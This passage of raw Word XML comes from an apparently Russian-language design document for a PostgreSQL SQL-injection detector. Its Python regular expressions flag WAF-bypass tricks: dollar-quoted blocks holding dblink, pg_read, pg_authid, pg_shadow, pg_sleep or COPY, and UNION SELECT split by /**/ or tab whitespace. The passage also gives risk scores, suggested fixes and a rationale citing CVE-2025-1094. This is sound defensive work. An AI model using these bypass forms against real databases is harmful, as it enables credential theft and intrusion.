        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.1 dollar-quote с опасным содержимым внутри</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48966464" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\$[a-zA-Z_][a-zA-Z0-9_]*\$[^$]*?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C962718" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:dblink|pg_read|pg_authid|pg_shadow|pg_sleep|EXECUTE|COPY)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766AA99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"[^$]*?\$[a-zA-Z_][a-zA-Z0-9_]*\$|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AB721D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.1 анонимный $$ ... $$ с опасным содержимым</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445CE20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\$\$[^$]*?(?:dblink|pg_read|pg_authid|pg_shadow|pg_sleep|EXECUTE|COPY)[^$]*?\$\$|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65018ABF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.6 UNION через /**/ как разделитель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0734BB86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bUNION\s*/\*[^*]*\*/\s*SELECT\b|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0ABA02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.6 UNION через не-space whitespace (tab/CR/LF/FF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E8649" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bUNION[\t\r\n\f]+SELECT\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C29B20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C5F729" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA7C63F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D3D60"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76D84139" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["filter_bypass_high"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B0E22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    findings.append(VulnerabilityFinding(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A13E2"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vulnerability_class=VulnerabilityClass.FILTER_BYPASS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B897D4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4498AF4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит encoding-приём (chr-цепочка, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30898C31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Unicode-escape, E-strings hex/octal byte-literals или "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D3F344" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "decode с длинной hex/base64-строкой) — паттерн обхода "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09284BC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "input-фильтра WAF или sanitizer-а.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EFBD20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-коде эти конструкции не нужны (для "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37586E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "binary-данных используются параметризованные bytea, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F484BB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "не текстовый decode-hex). Проверьте источник payload-а — "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D06C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "если приходит от пользователя, удалите конкатенацию и "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644966E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "перейдите на параметризацию.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD22ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0031BFBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elif _RE["filter_bypass_mid"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95367D"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6A580CCF"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vulnerability_class=VulnerabilityClass.FILTER_BYPASS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF060A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8076E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит dollar-quoted блок с опасной функцией внутри "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D020C56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(dblink, pg_read*, pg_authid, EXECUTE, COPY) или UNION с "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FFF02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "альтернативным whitespace (/**/, tab, CR) — паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06B94E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "доставки payload-а через input-фильтр.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFCD69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Dollar-quoting легитимен в plpgsql-функциях, но в "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43781A86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "runtime-сгенерированном SQL приложения — индикатор "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719E5760" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "ручной сборки. UNION с /**/-разделителем — почти "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628AEFC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "всегда WAF-bypass-попытка.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071D0FA4"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00EDCD77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Градация risk обоснована:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFFB43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter_bypass_high</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Encoding-приёмы (chr/U&amp;/E-string/decode) практически не имеют легитимных use case в application-коде. Bytea параметризируется напрямую через драйверный bytea-биндинг; UTF-8 normalisation — через серверный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert(... USING utf8_to_utf8)</w:t>
      </w:r>
      <w:r>
        <w:t>, не через ручную hex-склейку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A87198D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter_bypass_mid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dollar-quoting встречается в migration-скриптах и в plpgsql-функциях легитимно, но в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-сгенерированном SQL приложения — индикатор. UNION с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или non-space whitespace — почти всегда атака; одно правильное use case — generator кода (ORM, тесты), который проверяется по AST, а не статически.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBFDDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">risk ниже, чем у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (9-10) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>METADATA_RECON_HIGH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (10), потому что 3.9 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обходка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не атака сама по себе. Финальная категория (3.6 / 3.7 / 3.8) сама поднимет risk до 9-10. Если 3.9-сигнал срабатывает изолированно, без соседних </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>oob_exfil</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>meta_recon_high</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>copy_from_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это «странный SQL», но не обязательно атака; LLM-судья принимает решение по совокупности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577686E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Порядок проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>high → mid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гарантирует, что для запроса с E-string + dollar-quote сработает только high-ветка (risk 8), а не каскад.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79227614" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18CA83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Dollar-quoted strings: PostgreSQL Lexical Structure §4.1.2.4 (3.9.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641DD722" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-1094 SQL injection в psql через невалидный UTF-8 (3.9.7): PostgreSQL advisory, Rapid7 disclosure 13 февраля 2025, SecureLayer7 разбор. CVSS 8.1; CVE применяется только к chain-ам через psql, не к серверу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D3217E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
